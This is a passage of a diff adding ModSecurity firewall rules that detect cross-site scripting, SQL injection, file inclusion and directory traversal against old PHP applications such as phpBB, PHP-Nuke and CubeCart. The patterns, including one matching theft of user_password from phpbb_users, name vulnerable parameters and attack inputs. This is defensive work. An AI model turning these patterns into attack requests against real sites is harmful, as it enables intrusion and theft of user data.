+SecRule REQUEST_FILENAME "/showgallery\.php"         "chain,id:310313,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhotoPost showgallery.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:page "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|<)" 
+
+# Rule 310314: PhotoPost Pro
+SecRule REQUEST_URI "/showgallery\.php\?si=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"         "id:310314,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhotoPost showgallery.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310315: PhotoPost Pro
+#SecRule REQUEST_URI "/showgallery\.php\?ppuser=[0-9].*\&cat=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" #        "id:310315,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhotoPost showgallery.php cross-site-scripting attempt'"
+
+
+# Rule 310316: PhotoPost Pro
+#SecRule REQUEST_URI "/showgallery\.php\?(?:cat|ppuser)=[0-9].*\'" #        "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310316,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhotoPost showgallery.php SQL injection attempt'"
+
+
+# Rule 310320: Kayako eSupport Cross Site Scripting Vulnerability
+#SecRule REQUEST_URI "/esupport/index.php\?_a=knowledgebase\&_j=questiondetails\&_i=[0-9].*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310320,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Kayako eSupport index.php cross-site-scripting attempt'"
+
+
+# Rule 310321: Kayako eSupport Cross Site Scripting Vulnerability
+#SecRule REQUEST_URI "/esupport/index.php\?_a=knowledgebase\&_j=questionprint\&_i=[0-9].*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310321,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Kayako eSupport index.php cross-site-scripting attempt'"
+
+
+# Rule 310322: Kayako eSupport Remote Cross Site Scripting Vulnerability
+#SecRule REQUEST_URI "/esupport/index.php\?_a=troubleshooter\&_c=[0-9].*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310322,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Kayako eSupport index.php cross-site-scripting attempt'"
+
+
+# Rule 310323: Kayako eSupport Remote Cross Site Scripting Vulnerability
+#SecRule REQUEST_URI "/esupport/index.php\?_a=knowledgebase\&_j=subcat\&_i=[0-9].*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310323,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Kayako eSupport index.php cross-site-scripting attempt'"
+
+
+# Rule 310325:  phpSysInfo XSS vulns
+#SecRule REQUEST_URI "/includes/system_footer\.php\?text[template]=\"\>.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #SecRule REQUEST_URI "/includes/system_footer\.php" #        "chain,id:310325,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpSysInfo system_footer.php cross-site-scripting attempt'"
+#SecRule ARGS "^\"\>"
+
+
+# Rule 310327: DigitalHive Remote Unathenticated Software Re-install and
+# 	Cross-Site Scripting Vulnerabilities
+#SecRule REQUEST_URI "/base\.php\?page=forum/msg\.php-afs-1-\"/\>\<script\>" #        "id:310327,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: DigitalHive base.php cross-site-scripting attempt'"
+
+
+# Rule 310328: DigitalHive Remote Unathenticated Software Re-install and
+# 	Cross-Site Scripting Vulnerabilities
+#SecRule REQUEST_URI "/hive/base\.php\?page=membres\.php\&mt=\"/\>\<script\>" #        "id:310328,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: DigitalHive base.php cross-site-scripting attempt'"
+
+
+# Rule 310329: Topic Calendar Mod for phpBB Cross-Site Scripting Attack
+SecRule REQUEST_FILENAME "/calendar_scheduler\.php"         "chain,id:310329,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB Topic Calendar calendar_scheduler.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:start "(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+
+# Rule 310331: phpSysInfo Cross-Site Scripting Vulnerabilities
+#SecRule REQUEST_URI "/includes/system_footer\.php\?text.*=\"\>.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310331,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpSysInfo system_footer.php cross-site-scripting attempt'"
+
+
+# Rule 310332: phpSysInfo Cross-Site Scripting Vulnerabilities
+#SecRule REQUEST_URI "/includes/system_footer\.php\?text[template]=\"\>.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310332,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpSysInfo system_footer.php cross-site-scripting attempt'"
+
+
+# Rule 310333: phpSysInfo Cross-Site Scripting Vulnerabilities
+#SecRule REQUEST_URI "/includes/system_footer\.php\?hide_picklist=.*=\<iframe src.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310333,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpSysInfo system_footer.php cross-site-scripting attempt'"
+
+
+# Rule 310338: Vortex Portal Remote File Inclusion and Path Disclosure
+# 	Vulnerabilities
+SecRule REQUEST_URI "/content\.php\?act=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"         "id:310338,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Dream4 Koobi CMS content.php remote file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310339: Topic Calendar Cross Site Scripting
+#SecRule REQUEST_URI "/calendar_scheduler\.php\?start.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310339,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Topic Calendar calendar_scheduler.php cross-site-scripting attempt'"
+
+
+# Rule 310340: ESMI PayPal Storefront SQL inject and XSS
+SecRule REQUEST_URI "/ecdis/pages.php?idpages=\'"         "id:310340,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ESMI Paypal Storefront pages.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310341: ESMI PayPal Storefront SQL inject and XSS
+#SecRule REQUEST_URI "/ecdis/products.*.php?id=.*&id.*=\'" #        "id:310341,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ESMI Paypal Storefront products.php SQL injection attempt'"
+
+
+# Rule 310342: ESMI PayPal Storefront SQL inject and XSS
+#SecRule REQUEST_URI "/ecdis/products.*\.php\?id=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310342,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ESMI Paypal Storefront products.php cross-site-scripting attempt'"
+
+
+# Rule 310343: Nuke Bookmarks modules.php SQL Injection Vulnerability
+#SecRule REQUEST_URI "modules\.php\?name=bookmarks\&file=marks\&catname=.*\&category=.*/\*\*/(?:select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9| ]+[[:space:]](?:from|into|table|database|index|view)" #        "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310343,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PostNuke bookmarks modules.php SQL injection attempt'"
+
+
+# Rule 310344: Nuke Bookmarks XSS
+#SecRule REQUEST_URI "/modules\.php\?name=bookmarks\&file=(?:del_cat\&catname|del_mark\&markname|edit_cat\&catname|edit_cat\&catcomment|marks\&catname|uploadbookmarks\&category)=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310344,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PostNuke bookmarks modules.php cross-site-scripting attempt'"
+
+
+# Rule 310345:possible new vuln in tikiwiki
+SecRule REQUEST_URI "/tiki-list_faqs\.php\?offset=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"         "id:310345,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TikiWiki tiki-list_faqs.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310348:exoops Input Validation Flaws SQL injection and XSS
+#SecRule REQUEST_URI "/newbb/viewforum\.php\?sortname=p\.post_time\&sortorder=.*\&sortdays=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310348,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eXoops viewforum.php cross-site-scripting attempt'"
+
+
+# Rule 310350: Valdersoft Shopping Cart SQL injection and XSS
+#SecRule REQUEST_URI "/(?:item|category).php?sid=.*\&id=\'" #        "id:310350,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Valdersoft Shopping Cart (item,category).php SQL injection attempt'"
+
+
+# Rule 310352: Valdersoft Shopping Cart SQL injection and XSS
+#SecRule REQUEST_URI "/search_result\.php\?sid=.*\&search.*\'" #        "id:310352,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Valdersoft Shopping Cart search_result.php SQL injection attempt'"
+#
+
+# Rule 310353:OSCommerce XSS
+SecRule REQUEST_URI "/default\.php\? "         "chain,id:310353,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: OSCommerce default.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "(?:error_message|info_message)" chain
+SecRule REQUEST_URI "(?:(?:javascript|script|about|applet|activex|chrome)|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+
+# Rule 310354:Typo3 remote file retrieval
+SecRule REQUEST_URI "/dev/translations\.php\?only=\x2e\x2e/\x2e\x2e/\x2e\x2e/\x2e\x2e/\x2e\x2e/"         "id:310354,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Type3 translations.php remote file retrieval attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310355:Mambo XSS
+SecRule REQUEST_FILENAME "/emailfriend/(?:emailarticle|emailfaq|emailnews)\.php"         "chain,id:310355,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Mambo email(article,faq,news).php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:id "(?:\<script|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+
+# Rule 310356:Photopost XSS and sql injection
+#SecRule REQUEST_URI "photos/(?:showgallery|showmembers|slideshow)\.php\?.*\' " #        "id:310356,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Photopost SQL injection attempt'"
+
+
+# Rule 310357:Photopost XSS and sql injection
+SecRule REQUEST_URI "photos/(?:showgallery|showmembers|slideshow)\.php"         "chain,id:310357,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Photopost cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS "(?:\<script|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+
+# Rule 310358:TKai's Shoutbox XSS
+#SecRule REQUEST_URI "/shoutact\.php\?yousay=default\&query=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310358,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TKais Shoutbox shoutact.php cross-site-scripting attempt'"
+
+
+# Rule 310359:TKai's Shoutbox XSS
+#SecRule REQUEST_URI "/shoutact\.php\?yousay=default\&name=default&query=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310359,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TKais Shoutbox shoutact.php cross-site-scripting attempt'"
+
+
+# Rule 310360:TKai's Shoutbox XSS
+#SecRule REQUEST_URI "/shoutact\.php\?yousay=default\&email=default\&query=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310360,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TKais Shoutbox shoutact.php cross-site-scripting attempt'"
+
+
+# Rule 310361:TKai's Shoutbox XSS
+#SecRule REQUEST_URI "/shoutact\.php\?yousay=default\&email=default\&name=default\&query=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310361,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TKais Shoutbox shoutact.php cross-site-scripting attempt'"
+
+
+# Rule 310362:TKai's Shoutbox XSS
+#SecRule REQUEST_URI "/shoutact\.php\?yousay=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310362,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TKais Shoutbox shoutact.php cross-site-scripting attempt'"
+
+
+# Rule 310363:EncapsBB Remote File Inclusion Vulnerability
+#SecRule REQUEST_URI "/index_header.php?root=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" #        "id:310363,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: EncapsBB index_header.php remote file inclusion attempt'"
+
+
+# Rule 310366:PHPCoin
+SecRule REQUEST_URI "phpcoin/auxpage\.php\?page=\.\./\.\."         "id:310366,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPcoin auxpage.php directory traversal attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310373:PunBB version <= 1.2.2 auth bypass exploit
+#SecRule REQUEST_URI "profile\.php\?section=admin\&id=.*\&action=foo" #        "id:310373,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PunBB profile.php authentication bypass attempt'"
+
+
+# Rule 310378:PaFiledb Version 3.1 and below SQL injection and XSS
+SecRule REQUEST_URI "/pafiledb\.php\?action=viewall&id=&start=\'"         "id:310378,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PaFiledb pafiledb.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310379:PaFiledb Version 3.1 and below SQL injection and XSS
+SecRule REQUEST_URI "/pafiledb\.php"         "chain,id:310379,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PaFiledb pafiledb.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:id "(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" 
+
+# Rule 310381:PHPNuke general SQL injection
+SecRule REQUEST_URI "/modules\.php"         "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310381,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke modules.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:name "union.*select" 
+
+# Rule 310394:phpbb 2.0.13 download vuln
+#SecRule REQUEST_URI "/downloads\.php\?cat=.*(?:union|select|delete|insert)*user_password.*phpbb_users" #        "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310394,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB downloads.php SQL injection attempt'"
+
+
+# Rule 310395:Turnkey Websites Shopping Cart SQL injection
+#SecRule REQUEST_URI "/searchresults\.php\?searchTerm=\'" #        "id:310395,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Turnkey Shopping Cart searchresults.php SQL injection attempt'"
+
+
+# Rule 310396:Turnkey Websites Shopping Cart SQL injection
+#SecRule REQUEST_URI "/searchresults\.php\?searchTerm=.*\'" #        "id:310396,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Turnkey Shopping Cart searchresults.php SQL injection attempt'"
+
+
+# Rule 310397:Authentication bypass, directory transversal and XSS
+# 	vulnerabilities in PayProCart 3.0
+#SecRule REQUEST_URI "/usrdetails\.php\?sgnuptype=.*(?:(?:javsscript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310397,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PayProCart v3.0 usrdetails.php authentication bypass attempt'"
+
+
+# Rule 310399: PhpNuke 7.6=>x Multiple vulnerabilities cXIb8O3.12
+#SecRule REQUEST_URI "/banners\.php\?op=emailstats&name=.*&bid=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310399,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke >=v7.6 banners.php cross-site-scripting attempt'"
+
+
+# Rule 310400: PhpNuke 7.6=>x Multiple vulnerabilities cXIb8O3.12
+#SecRule REQUEST_URI "/modules\.php\?name=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310400,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke >=v7.6 modules.php cross-site-scripting attempt'"
+
+
+# Rule 310401: PHP-Nuke Input Validation Flaws in search, FAQ, and Banners
+# 	Modules Permit Cross-Site Scripting Attacks
+#SecRule REQUEST_URI "/modules\.php\?name=search&author=.*&topic=.*&min.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310401,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke >=v7.6 modules.php search cross-site-scripting attempt'"
+
+
+# Rule 310402: PHP-Nuke Input Validation Flaws in search, FAQ, and Banners Modules Permit Cross-Site Scripting Attacks
+#SecRule REQUEST_URI "/modules\.php\?name=faq&.*=.*&id_cat=.*&categories=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310402,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke >=v7.6 modules.php FAQ cross-site-scripting attempt'"
+
+
+# Rule 310403: PHP-Nuke Input Validation Flaws in search, FAQ, and Banners Modules Permit Cross-Site Scripting Attacks
+#SecRule REQUEST_URI "/modules\.php\?op=emailstats&login=.*&cid=.*&bid=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310403,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke >=v7.6 modules.php emailstats cross-site-scripting attempt'"
+
+
+# Rule 310404: PHP-Nuke Input Validation Flaws in search, FAQ, and Banners Modules Permit Cross-Site Scripting Attacks
+#SecRule REQUEST_URI "/modules\.php\?name=Encyclopedia&file=.*&op=.*&eid.*1&ltr=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310404,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke >=v7.6 modules.php Encyclopedia cross-site-scripting attempt'"
+
+
+# Rule 310406: #phpBB Calendar Pro catergory Parameter SQL Injection
+#SecRule REQUEST_URI "/cal_view_month\.php\?month=.*&year=.*&category=.*(?:union|select|delete|insert)" #        "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310406,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB cal_view_month.php SQL injection attempt'"
+
+
+# Rule 310408: cubecart SQL injection
+SecRule REQUEST_URI "/tellafriend\.php\?&product=\'"         "id:310408,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Cubecart tellafriend.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310409: cubecart SQL injection
+SecRule REQUEST_URI "/view_cart\.php\?add=\'"         "id:310409,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Cubecart view_cart.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310410: cubecart SQL injection
+SecRule REQUEST_URI "/view_product\.php\?product=\'"         "id:310410,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Cubecart view_product.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310411:PHPBB Links Pro Module SQL Injection Vulnerability
+SecRule REQUEST_URI "/links\.php\?func=show&id=\'"         "id:310411,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB links.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310412:LiteCommerce Multiple SQL Injection Vulnerabilities
+SecRule REQUEST_URI "/cart\.php\?target=\'"         "id:310412,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: LiteCommerce cart.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310413:LiteCommerce Multiple SQL Injection Vulnerabilities
+SecRule REQUEST_URI "/cart\.php\?target=category&category_id=\'"         "id:310413,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: LiteCommerce cart.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310414:LiteCommerce Multiple SQL Injection Vulnerabilities
+SecRule REQUEST_URI "/cart\.php\?target=product&product_id=\'"         "id:310414,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: LiteCommerce cart.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310415:PHP-Nuke "querylang" SQL Injection Vulnerability
+#SecRule REQUEST_URI "/modules\.php\?name=top&querylang=.*(?:union|select|delete|insert).*\" #        "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310415,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke modules.php querylang SQL injection attempt'"
+
+
+# Rule 310416:PHPBB DLMan Pro Module SQL Injection Vulnerability
+SecRule REQUEST_URI "/dlman\.php\?func=file_info&file_id=\'"         "id:310416,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB dlman.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310417:ModernBill XSS and file include
+SecRule REQUEST_URI "/samples/news\.php\?dir=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"         "id:310417,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ModernBill news.php file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310418:ModernBill XSS and file include
+#SecRule REQUEST_URI|REQUEST_BODY "/order/orderwiz\.php\?v=.*&aid=.*(?:<[[:space:]]*(?:script|about|applet|activex|chrome)*>.*(?:script|about|applet|activex|chrome)[[:space:]]*>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310418,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ModernBill news.php cross-site-scripting attempt'"
+
+
+# Rule 310421:SQL injection in jPortal version 2.3.1
+#SecRule REQUEST_URI "/jportal/banner\.php*(?:union|select|delete|insert)" #        "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310421,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: jPortal banner.php SQL injection attempt'"
+
+
+# Rule 310423:Serendipity exit.php SQL injection
+#SecRule REQUEST_URI "exit\.php\?entry_id=.*&url_id=.*(union|select).*(?:password|username).*from" #        "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310423,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Serendipity exit.php SQL injection attempt'"
+
+
+# Rule 310424:phpbb plus
+#SecRule REQUEST_URI "/groupcp\.php\?g=.*sid=\'" #        "id:310424,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB groupcp.php SQL injection attempt'"
+
+
+# Rule 310426:phpbb plus
+SecRule REQUEST_URI "/portal\.php"         "chain,id:310426,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB portal.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:article "'"
+
+
+# Rule 310427:phpbb plus
+#SecRule REQUEST_URI "/viewforum.php?f=.*sid=\'" #        "id:310427,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB viewforum.php SQL injection attempt'"
+
+
+# Rule 310428:phpbb plus
+#SecRule REQUEST_URI "/viewtopic.php?p=.*sid=\'" #        "id:310428,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB viewtopic.php SQL injection attempt'"
+
+
+# Rule 310429:phpbb plus
+#SecRule REQUEST_URI "/album_search\.php\?mode=\'" #        "id:310429,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB viewtopic.php SQL injection attempt'"
+
+
+# Rule 310430:phpbb plus
+#SecRule REQUEST_URI "/album_cat\.php\?cat_id=.*sid=\'" #        "id:310430,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB album_cat.php SQL injection attempt'"
+
+
+# Rule 310431:phpbb plus
+#SecRule REQUEST_URI "/album_comment\.php\?pic_id=.*sid=\'" #        "id:310431,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB album_comment.php SQL injection attempt'"
+
+
+# Rule 310432:phpbb plus
+#SecRule REQUEST_URI "calendar_scheduler\.php\?d=.*&mode=&start=\'\">" #        "id:310432,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB calendar_scheduler.php SQL injection attempt'"
+
+
+# Rule 310436: SPHPBlog search.PHP Cross-Site Scripting Vulnerability
+#SecRule REQUEST_URI "/search\.php\?q=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310436,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SPHPBlog search.php cross-site-scripting attempt'"
+
+
+# Rule 310437:All4WWW-Homepagecreator
